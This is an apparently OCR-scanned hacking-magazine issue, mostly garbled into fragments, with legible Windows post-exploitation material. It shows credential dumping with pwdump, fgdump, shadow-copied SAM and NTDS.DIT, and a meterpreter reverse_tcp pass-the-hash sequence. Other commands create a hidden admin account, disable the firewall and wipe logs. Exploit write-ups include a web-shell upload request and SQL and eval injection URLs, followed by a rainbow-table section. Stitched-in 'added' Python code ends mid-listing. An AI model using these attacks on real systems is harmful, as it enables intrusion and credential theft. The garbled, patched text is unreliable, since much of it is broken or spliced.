Appcelerator Titanium lwww. appceleato.com l. Titanium n Andoid iPhone, n lk.
, n n IDE . n Tita-nium n, n
[ $49 ]. $120 . l t Titanium , n 25 . n n n Apache 2.
Corona SDK lwww.anscamoile . com/coona l . n - iOS An-doid. . ,
OpenGL. n , - : $199 n $349 iOS Andoid. n n IDE .
n , JavaScipt.
[Figure: screenshot of the application showing the coordinates 56.84484567007557 ... and 56.84583899763894 ...]
n iOS, iOS ! , nn iOS D eve l ope
Pogaml. n n n App le, n
IAndoid, Windows Phonel n . , , n n n n - . n $99
n . Apple , n n . n n
n iOS n Stoe. , $99 n n , n - .
nn n - n iS - ! , n n n : it .l y/tD6xA!I . , n
. . ?
n -n n n n iOS n PhoneGap. n Objective-C,
n n n , n n API PhoneGap. nn n, n An do id Windows Moile 7, , - n n, n ! : phonegap . com/sta t l . n,
n n Ph oneGap, n lphonegap .com/apps]. PhoneGap-
n n n n. n , n n,
. n n, HTML+JS - n n , n n . , Ph one Gap
n Nitoi n l n n GitHub: github .com/ phonegap l. ,
n n Ni toi n Adobe . , nn n n n n ? ::
PCZONE Ant la.zhukov!Oreal.xakep.rul
WINDOWS-APOE WINDOWS-CCTEM
, , ,
, NTLM. .
.
? , . : S-, LM/NTLM-xe
; LSA, LM/NTLM-xe
, ; , Sh-
, ! , , ! .
, -. : !
, , . 7
.
1 PWDUMP FGDUMP , . NTLM/LM-xe .
, DLL- SeDebugPivilege . ,
la NT AUTHORIY\SYSTEMI . , : ,
(LiveCD), , kon-boot (www.piotrbania.com/all/kon-boot), .
(NT AUTHORITY\SYSTEM), EasyHack . . pwdump (www.foofus.net/~fizzgig/pwdump) and fgdump (www.foofus.net/~fizzgig/fgdump).
, . :
    pwdump localhost
    fgdump.exe
The results are written to 127.0.0.1.pwdump and 127.0.0.1.cachedump.
, , .
, , pwdump, :
    > pwdump -o mytarget.log -u MYDOMAIN\someuser -p 'lamepassword' 10.1.1.1
Here 10.1.1.1 is the target host, MYDOMAIN\someuser the account, lamepassword its password and mytarget.log the output file. fgdump accepts the same options as pwdump, plus a list of hosts:
    > fgdump.exe -f hostfile.txt -u MYDOMAIN\someuser -T 10
hostfile.txt is the file with the list of hosts, one per line, and 10 is the number of threads.
, ! !.
, fgdump.exe.
2 VOLUME SHADOW SERVICE pwdump fgdump , , , . , . ,
SAM, , . , , - SYSTEM . , , - . - , , , . , , , .
, >> , Volume Shadow Service ! ! .
Windows S v 2003. , , System State ntbackup
IVolume Shadow f Shaed Foldes l . ,
l , SAM SYSTEMI, .
, Wi ndows , , . , . , -
, . HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount set to «0».
, . .
Widows-apoe
w n n n pwdump
Windows Credentials Editor (WCE)
, vssown.vbs (tools.lanmaster53.com/vssown.vbs), . . Start the service: cscript vssown.vbs /start.
Create a shadow copy: cscript vssown.vbs /create. List the copies: cscript vssown.vbs /list.
. Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14 (14 is the number of the copy). . 1. Copy the files:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\system32\config\SYSTEM .
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\system32\config\SAM .
2. , - SAMInside (insidepro.com/rus/saminside.shtml)
.
_ ! , , ,
! , . ,
SAM SYSTEM. For Active Directory the database is NTDS.DIT:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\ntds\ntds.dit .
, SYSTEM. , ? SYSTEM NTDS.DIT,
n n ? , , n NTDS.DIT , .
Csaba Barta , NTDS.DIT .
csababarta.com/downloads/
PCZONE
ntds_dump_hash.zip. , . n n BackTrack 5 (n Linux),
n . , . Build libesedb:
    cd libesedb
    chmod +x configure
    ./configure && make
. , :
    cd esedbtools
    ./esedbdumphash ../../ntds.dit
Output: ./libesedb/esedbtools/ntds.dit.export/datatable . ,
SYSTEM:
    cd ../../creddump/
    python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable
! ! , ! ] . , password history:
    python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable
, , ! ] .
' HASHGRAB2+ SAMDUMP2
, . , , LiveCO !, Offline NT Passwod & Registy Edi t o],
- , .
HashGrab2 (py1337.get-root.com/tools/hashgrab2) and samdump2 (sourceforge.net/projects/ophcrack/files/samdump2/2.0.1),
Liv- . HashGab2 Windows-pae, , n samdump2
SAM SYSTEM .
    msf > set payload windows/meterpreter/reverse_tcp
    msf > set rhost [target host]
    msf > set smbpass [hash]
    msf > set smbuser [user]
    msf > set lhost [own host]
    msf > exploit
    meterpreter > shell
, , . , . ,
getsystem. , MS09-012, MS10-015 (KiTrap0D).
6 PASS-THE-HASH NTLM . , . -
:1. - , Pass The Hash, 1997 . Pass-the-Hash Toolkit (oss.coresecurity.com/projects/pshtoolkit.html): IAM.EXE, WHOSTHERE.EXE,
GENHASH.EXE. , GENHASH computes LM and NT hashes . WHOSTHERE.
, -, .
, : , / NL- . IAM. - , [ , , . .l,
, , .
, NL-, ,
. , , Windows-ccee, ? . ,
? -, .
n n nwn nn . n , , n n ( nmap, - w), .
    ipconfig /all
    ipconfig /displaydns
    netstat -nabo
    netstat -s -p [tcp|udp|icmp|ip]
    route print
.
DNS cache.
/U-. - , , .
netstat -s - statistics per protocol (TCP, UDP, ICMP, IP).
, , 445:
    netstat -an | findstr :445
    net view
    net user %USERNAME% /domain
    net accounts
    net accounts /domain
    net localgroup administrators
    net localgroup administrators /domain
    net config workstation
    net share
SMB [!.
[ '/domai', l. , , , . .
[ ! .
.
.
>> .
, NetBIOS, , , , .
S - .
~ - R- .
The hosts file:
    type %WINDIR%\System32\drivers\etc\hosts
    whoami
    whoami /all
    qwinsta
    ver
    set
    systeminfo (XP+)
    qprocess
n enna - . (n~~ : n ( r ), , , , r nr . .
whoami /all additionally prints the SID of the user and the SIDs of all its groups.
, , - . R- ! !, .
ver (the Windows analogue of uname) prints the OS version. set prints the environment variables; the useful ones are USERDOMAIN, USERNAME, USERPROFILE, LOGONSERVER, COMPUTERNAME, APPDATA and ALLUSERSPROFILE. qprocess lists the running processes with their session ID and PID.
schtasks /query /fo csv /v > [file].csv
writes the full list of scheduled tasks in CSV format.
at
The at command runs a task as SYSTEM (Win7 x64). To run d:\pentest\do_something.bat as SYSTEM at 15:41:
at 15:41 /interactive "d:\pentest\do_something.bat"
schtasks (XP+)
net start
sc query
sc getkeyname ""
sc queryex ""
tasklist (XP+)
taskkill [/f] /pid
sc getkeyname and sc queryex show a service's key name and its PID.
taskkill [/f] /im [image name]
gpresult /z
wevtutil el
wevtutil qe
wevtutil el lists the event logs and wevtutil qe queries one of them. Deleting the log files: del %WINDIR%\*.log /s /q /f
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features
Dism (Windows Vista SP1/7/2008/2008R2) lists and enables the optional Windows features that are not installed by default, such as the telnet and TFTP clients:
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP
ntsd -server tcp:port=1337 calc.exe
ntsd -remote tcp:server=,port=1337
net use
reg save HKLM\Security security.hive
The TFTP feature provides tftp.exe. Before Windows Vista, ntsd.exe ships in system32 and can be used as a remote debugger over TCP ("NTSD Backdoor").
reg save HKLM\Security security.hive dumps the Security hive; the SAM and System hives are saved the same way.
reg add [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName] /t [Type, e.g. REG_BINARY] /d [Data, e.g. fe340ead]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName]
reg query [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName]
tree C:\ /f /a > C:\output_of_tree.txt
dir \ /s /b | find /i "search_string"
Backup files such as sam_backup.dat are worth looking for: dir \ /s /b lists every file on the drive in bare format and find /i filters the list by search_string.
WMIC
WMI (Windows Management Instrumentation) and its command-line client WMIC:
wmic baseboard get Manufacturer, Model, Product, SerialNumber, Version
wmic nicconfig get caption, macaddress, ipaddress, DefaultIPGateway
wmic nicconfig where "IPEnabled = 'TRUE' and DNSDomain IS NOT NULL" get DefaultIPGateway, DHCPServer, DNSDomain, DNSHostName, DNSServerSearchOrder, IPAddress, IPSubnet, MACAddress, WINSEnableLMHostsLookup, WINSPrimaryServer, WINSSecondaryServer /format:list
wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status
wmic os get bootdevice, caption, csname, currenttimezone, installdate, servicepackmajorversion, servicepackminorversion, systemdrive, version, windowsdirectory /format:list
wmic product get Caption, InstallDate, Vendor
wmic path win32_product where "name = 'Software Update'" call Uninstall
WMIC exposes the WMI classes (computersystem, bios, baseboard and others) through a simple query syntax.
: , -, I- , .
.
n , .
.
.
The last command uninstalls the product named "Software Update".
, . .
net user hacker hacker /add
net localgroup administrators hacker /add
net share nothing$=C:\ /grant:hacker,FULL /unlimited
net user username /active:yes /domain
netsh firewall set opmode disable
wmic product get name /value
wmic product where name="XXX" call uninstall /nointeractive
rundll32.exe user32.dll,LockWorkStation
The first three commands create the user hacker, add it to the local administrators group and share C:\ with full access for it.
The remaining commands enable a disabled domain account, disable the Windows firewall, list the installed products and silently uninstall one, and lock the workstation.
EASY
JAVA
, Java, , . , Java , Flash, , . ?
Which Java version is installed can be checked at javatester.org/version.html.
. ? ,
CVE-2010-4452 in Metasploit:
1) use exploit/windows/browser/java_codebase_trust
2) set URIPATH test.php
   set LPORT 88
3) set payload java/meterpreter/reverse_tcp
4) exploit
tt :]. , Java ? . : -
, J v- .
, , ,
JavaScript and a Java applet [defcon-russia.ru/wall.txt]. SET (Social-Engineer Toolkit) [www.social-engineer.org] ships with BackTrack 5. The SET menu path is: 1) Website Attack Vectors; 2) The Java Applet Attack Method; 3) Web Templates [or Site Cloner]; 4) the Gmail template; 5) Import your own executable,
.
- . , , Java .
, ? ? ? ?:] , , , , . , [ :11, . , - ,
SMTP (25/tcp), for example Gmail or Mail.ru.
, , , , , , - . ? 150 . , IP.
[www.proxy.ru]. security.nnov.ru,
, , . :1 [ * ], [
l :
pro)(y -25
- . , . - . , ?
[www.example.com:25]. nmap can also scan UDP and use ICMP.
[Screenshot: the LAN proxy settings dialog: Use proxy server for your LAN (These settings will not apply to dial-up or VPN connections), Address, Port, Advanced..., Bypass proxy server for local addresses]
1 EASY
REVERSE PROXY
~ , vs. ? , -, [) -
. ? . , vs-
WAF, SSL server, , [, ) .
. , [ , - ?). .
vs- - . ?
- . . , X-Forwarded-For, , ! , -
, .
[goo.gl/VObeW]. RFC 2616 (HTTP/1.1) defines the Max-Forwards header, which is honoured for TRACE and OPTIONS requests.
HTTP-Traceroute. Squid as a reverse proxy in front of Wikipedia.org.
reverse proxy
, , , . , GET POST,
Just as traceroute relies on the IP TTL, HTTP-Traceroute sends requests (TRACE, GET or POST) with increasing Max-Forwards values, so proxies that follow the RFC answer one hop at a time:
HTTP-Traceroute.py -t www.victim.com -m (TRACE|GET|POST)
CSRF
, CSRF (Cross Site Request Forgery) . , - . , ,
[, ) , [ , ) . ,
, , ,
JavaScript. A GET request: http://server.com/change_password.php?NP=new_pass, where new_pass is
, . , L' :
,
. GET-an poc- . , S?
:
document.passwd.submit();
l XML-anpoca? - XM L-a np oc. :)
document.passwd.submit();
, , . ; ) .
EASY
(digital forensics).
, ,-
. , : ; n ;
; DLLs; ; ; ; Virtual Address Descriptors; ; . .
, , , , . Volatility 19QQ]L Hi5ip l. Python'e Windows ! XPI, , 32- .
, , n . , n .
! !, , n
. , ,
MoonSols DumpIt [http://goo.gl/BY1QN]. :
. , n , ! ,
USB). Volatility, written in Python, is also available as a standalone binary.
, :
volatility.exe imageinfo -f d:\test.raw
imageinfo is the plugin; -f d:\test.raw is the memory image. Volatility suggests a profile (WinXPSP3x86), which is used in the following commands.
- :
volatility pslist -f d:\test.raw --profile=WinXPSP3x86
, , :
volatility netscan -f d:\test.raw --profile=WinXPSP3x86
- , , , SAM, - LSA?
Windows .
volatility hivelist -f d:\test.raw --profile=WinXPSP3x86
hivelist- , .
, :
volatility hashdump -f d:\test.raw --profile=WinXPSP3x86 -y [System hive offset] -s [SAM hive offset]
hashdump dumps the password hashes; -y is the virtual offset of the System hive and -s that of the SAM hive, both taken from the hivelist output.
, . , . , , . Volatility. , ,
.
/
-
. , , ,
, , .
051,
[ivinside.iogspot.coml [115612, . , .11
1. Microsoft Office 2007 Excel .xlb. CVSSv2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). Date: 5 2011. Authors: Aniway, abysssec, sinn3r, juan vazquez. CVE: CVE-2011-0105.
n , i Excel.
.
, !, ). xl b.
ajax_save_name.php:
@ob_start();
require_once(CLASS_SESSION_ACTION);
$sessionAction = new Session_Action();
$selectedDocuments = $sessionAction->get();
if (removeTrailingSlash($sessionAction->getFolder()) == getParentPath($_POST['id'])
    && sizeof($selectedDocuments)) {
    if (($key = array_search(basename($_POST['id']), $selectedDocuments)) !== false) {
        $selectedDocuments[$key] = $_POST['value'];
        $sessionAction->set($selectedDocuments);
    }
    echo basename($_POST['id']) . "\n";
    displayArray($selectedDocuments);
} elseif (removeTrailingSlash($sessionAction->getFolder()) == removeTrailingSlash($_POST['id'])) {
    $sessionAction->setFolder($_POST['id']);
}
writeInfo(ob_get_clean());
BIFF8. A BIFF stream is a sequence of substreams, each enclosed in BOF/EOF records:
BOF (workbook globals)
  Workbook globals records
EOF
BOF (worksheet)
  Sheet records
EOF
BOF (worksheet)
  Sheet records
EOF
Every record has the same layout: ID (2 bytes, the record type), sz (2 bytes, the data size) and sz bytes of data. The ID determines how the data is interpreted. BOF is Beginning Of File and EOF is End Of File.
The BOF record in BIFF8 is 16 bytes long:
2 bytes: record ID (0809h)
2 bytes: record length (0010h)
2 bytes: vers, the BIFF version (0600h for BIFF8)
2 bytes: dt, the substream type
2 bytes: rupBuild
2 bytes: rupYear
4 bytes: bfh, file history flags
4 bytes: sfo, the lowest Excel version that can read the file
The dt field values:
0005h - Workbook globals
0006h - Visual Basic module
0010h - Worksheet
0020h - Chart
0040h - BIFF4 Macro sheet
0100h - BIFF4 Workbook globals
BOF 7. , . sub_30199E55.
. . , , ,
.
.text:e5F8e  call sub_11
.text:e5F835 cmp  , h
.text:e5F838 mov  [ebp+var_ED4],
.text:e5F83E jz   l_54488
.text:e5F844 call sub_11
.text:e5F849 mov  , [ebp+var_EDC]
.text:e5F84F imul , [ebp+var_Fee]
.text:e5F856 mov  edi,
.text:e5F858 mov  , [ebp+var_EEe]
.text:e5F85E lea  , [ ++ ]
.text:e5F862 call sub_l
.text:e5F867 push eFFFFFFFDh
.text:e5F869      edx
.text:e5F86A sub  edx,
.text:e5F86C add  , edx
.text:e5F86E push       ; Dst
.text:e5F86F push       ; int
.text:e5F87e mov  , edi
.text:e5F872 call sub_30199E55
, sub_30199E55 , . , .
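As an added example (not code from the article or from Excel), a small Python parser for a BIFF8 record stream that checks every declared record length against the bytes actually present, which is the check missing in front of the memcpy above. The sample stream is constructed inline; the BOF field layout and the dt type codes are the BIFF8 ones listed above.

```python
import struct

BOF_ID, EOF_ID = 0x0809, 0x000A
# dt field of the BOF record: substream type codes defined by BIFF8
BOF_SUBSTREAM_TYPES = {
    0x0005: "Workbook globals",
    0x0006: "Visual Basic module",
    0x0010: "Worksheet",
    0x0020: "Chart",
    0x0040: "BIFF4 Macro sheet",
    0x0100: "BIFF4 Workbook globals",
}


class BiffError(ValueError):
    """Raised for any record whose header or length does not fit the stream."""


def iter_records(stream):
    """Yield (record_id, payload) from a raw BIFF record stream.

    The declared size is compared with the bytes that remain before any
    payload is sliced, so a record that claims more data than exists is
    rejected instead of being read past the end of the buffer.
    """
    off, n = 0, len(stream)
    while off < n:
        if n - off < 4:
            raise BiffError(f"truncated record header at offset {off}")
        rid, size = struct.unpack_from("<HH", stream, off)
        if size > n - off - 4:
            raise BiffError(f"record 0x{rid:04X} at offset {off} declares "
                            f"{size} bytes but only {n - off - 4} remain")
        yield rid, stream[off + 4:off + 4 + size]
        off += 4 + size


def parse_bof(payload):
    """Return (vers, dt): vers is 0x0600 for BIFF8, dt the substream type."""
    if len(payload) < 4:
        raise BiffError("BOF payload shorter than the 4 bytes of vers+dt")
    return struct.unpack_from("<HH", payload, 0)


def substream_layout(stream):
    """List the substreams as (type name, vers) and verify BOF/EOF pairing."""
    layout, open_type = [], None
    for rid, payload in iter_records(stream):
        if rid == BOF_ID:
            if open_type is not None:
                raise BiffError("BOF while a substream is still open")
            vers, dt = parse_bof(payload)
            if dt not in BOF_SUBSTREAM_TYPES:
                raise BiffError(f"unknown BOF substream type 0x{dt:04X}")
            open_type = BOF_SUBSTREAM_TYPES[dt]
            layout.append((open_type, vers))
        elif rid == EOF_ID:
            if open_type is None:
                raise BiffError("EOF without a matching BOF")
            open_type = None
    if open_type is not None:
        raise BiffError("stream ends inside a substream")
    return layout


def check_stream(stream):
    """(True, layout) for a well-formed stream, (False, reason) otherwise."""
    try:
        return True, substream_layout(stream)
    except BiffError as exc:
        return False, str(exc)


# --- constructed sample data (not taken from a real workbook) ---
def _record(rid, payload):
    return struct.pack("<HH", rid, len(payload)) + payload


def _bof(dt):  # fields: vers, dt, rupBuild, rupYear, bfh, sfo
    return _record(BOF_ID, struct.pack("<HHHHII", 0x0600, dt, 0x0DBB, 0x07CC, 0, 0))


GOOD_STREAM = (_bof(0x0005) + _record(0x0042, b"\xb5\x04") + _record(EOF_ID, b"")
               + _bof(0x0010) + _record(0x0200, bytes(14)) + _record(EOF_ID, b""))
# a record header claiming 0x1000 bytes of data when only 8 bytes follow it
OVERSIZED_STREAM = _bof(0x0005) + struct.pack("<HH", 0x0200, 0x1000) + bytes(8)

if __name__ == "__main__":
    print(check_stream(GOOD_STREAM))
    print(check_stream(OVERSIZED_STREAM))
```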
Listing 1: checkFile()
public static function checkFile($name) {
    if ($GLOBALS['configuration']['file_black_list'] != '') {
        $blacklist = explode(",", $GLOBALS['configuration']['file_black_list']);
    } else {
        $blacklist = array();
    }
    $blacklist[] = 'php';
    $extension = pathinfo($name, PATHINFO_EXTENSION);
    foreach ($blacklist as $value) {
        if ($extension == trim(mb_strtolower($value))) {
            throw new EfrontFileException(_YOUCANNOTUPLOADFILESWITHTHISEXTENSION . ': ' . $extension,
                                          EfrontFileException::FILE_IN_BLACK_LIST);
        }
    }
}
.text:30199E0  cmp  edi, [esp+4+Dst]
.text:30199E4  ja   loc_303EE1B7
.text:30199EA  mov  , [esp+4+arg_0]
.text:30199EE  push
.text:30199EF  mov  , dword_30F72C0
.text:30199E75 push
.text:30199E7  mov  , nNumberOfBytesToRead
.text:30199E7C push esi
.text:30199E7D mov  [esp+10h+Dst],
.text:30199E93 mov  , [esp+10h+Dst]
.text:30199E97 push esi                    ; Size
.text:30199E98 lea  edx, dword_30FEB8[ebx]
.text:30199E9E push edx                    ; Src
.text:30199E9F push                        ; Dst
.text:30199EA0 sub  edi, esi
.text:30199EA2 call memcpy
.text:30199EA7 add  [esp+1Ch+Dst], esi
.text:30199EAB add  , esi
.text:30199EAD add  esp, 0Ch
.text:30199EB0 test edi, edi
.text:30199EB2 mov  dword_30F72C0,
.text:30199EB8 jnz  loc_301E0DB
, .
, /GS and /SAFESEH. /GS (MS Visual Studio) , . , ,
. cookie, . 64-bit , , cookie. , ,
. - . /SAFESEH SEH handlers.
, , n
. , . Visual Studio
/SAFESEH
-. n
. memcpy, , /GS . , esp . , call esp .
Targets: Microsoft Office Excel 2007, Microsoft Office Excel 2007 SP2.
2. MS11-077 Win32k Null Pointer Dereference Vulnerability. CVSSv2 [score] (AV:L/AC:L/Au:N/C:C/I:C/A:C). Date: 2011. Author: KiDebug. CVE: CVE-2011-1985.
wi n32k.sys , .
>> n.
.text:BF9140C0 ; __stdcall NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
.text:BF9140C0 _NtUserfnINCBOXSTRING@28 proc near  ; CODE XREF: xxxDefWindowProc(x,x,x,x)+E
.text:BF9140C0                                     ; NtUserMessageCall(x,x,x,x,x,x,x)+1
.text:BF9140C0
.text:BF9140C0 WND    = dword ptr 8
.text:BF9140C0 arg_4  = dword ptr 0Ch
.text:BF9140C0 arg_8  = dword ptr 10h
.text:BF9140C0 arg_C  = dword ptr 14h
.text:BF9140C0 arg_10 = dword ptr 18h
.text:BF9140C0 arg_14 = dword ptr 1Ch
.text:BF9140C0 arg_18 = dword ptr 20h
.text:BF9140C0
.text:BF9140C0 mov  edi, edi
.text:BF9140C2 push ebp
.text:BF9140C3 mov  ebp, esp
.text:BF9140C5 mov  ecx, [ebp+WND]     ; WND == 0xffffffff (-1)
.text:BF9140C8 mov  , [ecx+20h]        ; BSOD
NtUserMessageCall dispatches CB_ADDSTRING to NtUserfnINCBOXSTRING:
.text:BF88EE6B ; int __stdcall NtUserMessageCall(int, int, int UnicodeString, PVOID Address, int, int, int)
.text:BF88EEB1 push  [ebp+arg_18]                  ; int
.text:BF88EEB4 movzx eax, ds:_MessageTable[eax]
.text:BF88EEBB push                                ; int
.text:BF88EEBC push  [ebp+arg_10]                  ; int
.text:BF88EEBF and   eax, 0Fh
.text:BF88EEC2 push  [ebp+Address]                 ; Address
.text:BF88EEC5 push  [ebp+UnicodeString]           ; int
.text:BF88EEC8 push  [ebp+arg_4]                   ; int
.text:BF88EECB push  esi                           ; int
.text:BF88EECC call  ds:_gapfnMessageCall[eax*4]   ; NtUserfnINSTRINGNULL(x,x,x,x,x,x,x)
.rdata:BF998D68 _gapfnMessageCall dd offset _NtUserfnNCDESTROY@28 ; DATA XREF: NtUserMessageCall(x,x,x,x,x,x,x)
.rdata:BF998D68                                                  ; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF998D6C dd offset _NtUserfnNCDESTROY@28                  ; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF998D70 dd offset _NtUserfnINLPCREATESTRUCT@28           ; NtUserfnINLPCREATESTRUCT(x,x,x,x,x,x,x)
...
.rdata:BF998DD4 dd offset _NtUserfnINCBOXSTRING@28               ; NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
,
SendMessageCallback((HWND)-1, CB_ADDSTRING, 0, 0, 0, 0);
SendNotifyMessage((HWND)-1, CB_ADDSTRING, 0, 0);
Messages that trigger the BSoD:
CB_ADDSTRING 0x143
CB_INSERTSTRING 0x14A
CB_FINDSTRING 0x14C
CB_SELECTSTRING 0x14D
CB_FINDSTRINGEXACT 0x158
LB_ADDSTRING 0x180
LB_INSERTSTRING 0x181
LB_SELECTSTRING 0x18C
LB_FINDSTRING 0x18F
LB_FINDSTRINGEXACT 0x1A2
LB_INSERTSTRINGUPPER 0x1AA
LB_INSERTSTRINGLOWER 0x1AB
LB_ADDSTRINGUPPER 0x1AC
LB_ADDSTRINGLOWER 0x1AD
Targets: Windows XP SP3 / XP SP2 x64, Windows Server 2003 SP2 (x86, itanium, x64), Windows Vista SP2 32/64, Windows Server 2008 SP2 32/64/itanium, Windows 7 32/64, Windows 7 SP1 32/64, Windows Server 2008 R2 x64/itanium, 2008 R2 SP1 x64/itanium.
Solution: MS11-077.
3. WordPress Zingiri Web Shop Plugin. CVSSv2 [score] (AV:N/AC:L/Au:N/C:P/I:P/A:P).
WordPress . , ,
. - -,-
, . Egidio Romano aka EgiX . EgiX 13 , , .
Analysis: /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php, lines 37-56 (listed above). $selectedDocuments is filled from the POST parameter value. It is then passed to displayArray() and to writeInfo(), which writes $selectedDocuments to a file. writeInfo() is defined in /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/[...]_folder.php:
function writeInfo($data, $die = false) {
    $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+');
    @fwrite($fp, $data);
    @fwrite($fp, "\n\n" . date('d/M/Y H:i:s'));
    @fclose($fp);
}
GetUserTimeTarget()
data.php is written into the plugin directory, where it is reachable over the web. The exploit is on exploit-db.com [EDB-ID: 18111].
.
, , :
// Arch Linux
# pacman -S php
// Debian-based
# apt-get install php
Then run:
$ php 18111.php
The vulnerable code is not specific to WordPress: the Joomla! version of the plugin has the same code, with the path built from CONFIG_SYS_ROOT_PATH.
Targets: WordPress Zingiri Web Shop Plugin 0.9.12 to 2.2.3.
Solution: 2.2.4.
4. eFront. CVSSv2 [score] (AV:N/AC:L/Au:N/C:P/I:P/A:P).
Also found by EgiX, this time in eFront.
Analysis: 1. /www/editor/tiny_mce/plugins/save_template/save_template.php (lines 8-18):
if ($_POST['templateName']) {
    $dir = '../../../../content/editor_templates/' . $_SESSION['s_login'];
    if (!is_dir($dir) && !mkdir($dir, 0755)) {
        throw new Exception(_COULDNOTCREATEDIRECTORY);
    }
    $filename = $dir . '/' . $_POST['templateName'] . '.html';
    $templateContent = $_POST['templateContent'];
    if (file_exists($filename) === false) {
        $ok = file_put_contents($filename, $templateContent);
        chmod($filename, 0644);
    }
}
file_put_contents() writes $_POST['templateContent'] to a file whose name is built from $_POST['templateName'] without any validation. The '.html' suffix is cut off with a null byte, which works when magic_quotes_gpc is off:
POST /efront/www/editor/tiny_mce/plugins/save_template/save_template.php HTTP/1.1
Host: localhost
Content-Length: [...]
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

templateName=sh.php%00&templateContent=<?php evil_code(); ?>
2. checkFile() in /libraries/filesystem.class.php, lines 3143-3154 (Listing 1). FileSystemTree::uploadFile() calls checkFile(), which rejects the extensions from file_black_list: php, php3, jsp, asp, cgi, pl, ..., bat (and php is always added).
3. SQL injection in an UPDATE query. getUserTimeTarget() in /libraries/tools.php returns the package_ID part of its argument as $entity. /www/periodic_updater.php:
if ($_SESSION['s_login']) {
    $entity = getUserTimeTarget($_GET['HTTP_REFERER']);
    //$entity = $_SESSION['s_time_target'];
    //Update times for this entity
    $result = eF_executeNew("update user_times set time=time+(" . time() . "-timestamp_now),timestamp_now=" . time()
        . " where session_expired=0 and session_custom_identifier='" . $_SESSION['s_custom_identifier']
        . "' and users_LOGIN = '" . $_SESSION['s_login'] . "' and entity = '" . current($entity)
        . "' and entity_id = '" . key($entity) . "'");
}
$_GET['HTTP_REFERER'] is passed to getUserTimeTarget() and from there straight into eF_executeNew(). The SQL injection is triggered by the URL:
http://localhost/efront/www/periodic_updater.php?HTTP_REFERER=http://host/?package_ID=[SQL]
$_SERVER['HTTP_REFERER'], , -,
. .
4. /www/index.php:
if (isset($_COOKIE['cookie_login']) && isset($_COOKIE['cookie_password'])) {
    try {
        $user = EfrontUserFactory::factory($_COOKIE['cookie_login']);
        $user->login($_COOKIE['cookie_password'], true);
$_COOKIE['cookie_login'] is passed to EfrontUserFactory::factory(),
, :
GET /efront/www/index.php HTTP/1.1
Host: localhost
Cookie: cookie_login=admin;cookie_login=1;cookie_login=administrator;cookie_login=1;cookie_password=1
Connection: keep-alive
5. /www/student.php:
if (isset($_GET['course']) || isset($_GET['from_course'])) {
    if ($_GET['course']) {
        $course = new EfrontCourse($_GET['course']);
    } else {
        $course = new EfrontCourse($_GET['from_course']);
    }
    $eligibility = $course->checkRules($_SESSION['s_login']);
$_GET['course'] and $_GET['from_course'] go into the EfrontCourse constructor, and from there into eval():
/student.php?lessons_ID=1&course[id]=1&course[directions_ID]=1&course[rules]=a:1:{s:19:"1];phpinfo();die;/*";a:1:{s:6:"lesson";i:0;}}
I Radeon 4850 2 n
2,2 !
n MD5 n n
.
Links: bit.ly/yEhdi; RainbowCrack; bit.ly/viSB9K; blog.chivavas.org (MD5).
, . -, ,
,
. , , MD5. .
:
, . , .
. -
l l , . .
MD5.
MD5 produces a 128-bit hash. It was designed in 1991 as a replacement for MD4 and published in 1992 as RFC 1321. MD5 is used everywhere, from CMS password storage to SSL certificates. The first weaknesses were published in 1993. In 1996 a collision of the MD5 compression function was found, and since then SHA-1 (later SHA-2) or RIPEMD-160 have been recommended instead. A full MD5 collision was found in 2004. CertainKey Cryptosystems had started the distributed MD5CRK project to find one, but on 24 ... 2004, ,
[Screenshot: rcrack output listing the cracked hashes with their plaintexts]
RainbowCrack runs on Linux and Windows and supports LM/NTLM, MD5 and SHA1. Ready-made tables exist for MD5, SHA1, LM and NTLM; the LM/NTLM, MD5 and SHA1 sets are around 200 each.
rtgen generates the tables. Its parameters:
hash_algorithm: LM, NTLM, MD5 or SHA1;
charset: a character set from charset.txt;
plaintext_len_min and plaintext_len_max: the password length range;
table_index, chain_len, chain_num and part_index: the table parameters [bit.ly/dT8M].
1. table_index selects the reduction function, so tables with different indices cover different chains. 2. chain_len is the length of each chain. 3. chain_num is the number of chains in the table. 4. part_index is the part number when one table is split into several files.
[ 0). >> MD5:
rtgen.exe md5 loweralpha-numeric 1 7 0 2000 97505489 0
Generation takes a while: on an Intel Atom N450 the table md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt took about 1.5 ...
, . n
The table then has to be sorted with rtsort.exe:
rtsort.exe md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt
Example hash: d8578edf8458ce06fbc5bb76a58c5ca4. Start rcrack_gui.exe, enter the hash through Add Hash... (or load a file through File...), then choose Rainbow Table, Search Rainbow Tables..., select md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt and click Open. The search starts.
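As an added example (not code from the article or from RainbowCrack), the chain construction behind rtgen and the lookup behind rcrack in Python, on a deliberately tiny keyspace so it runs in a second: loweralpha, 1 to 3 characters, chain_len 50, chain_num 400, table_index 0. The reduction function is a simplified stand-in for RainbowCrack's; the start points and the "secret" are constructed here.

```python
import hashlib

CHARSET = "abcdefghijklmnopqrstuvwxyz"   # rtgen charset "loweralpha"
MAX_LEN = 3                              # plaintext_len_min=1, plaintext_len_max=3
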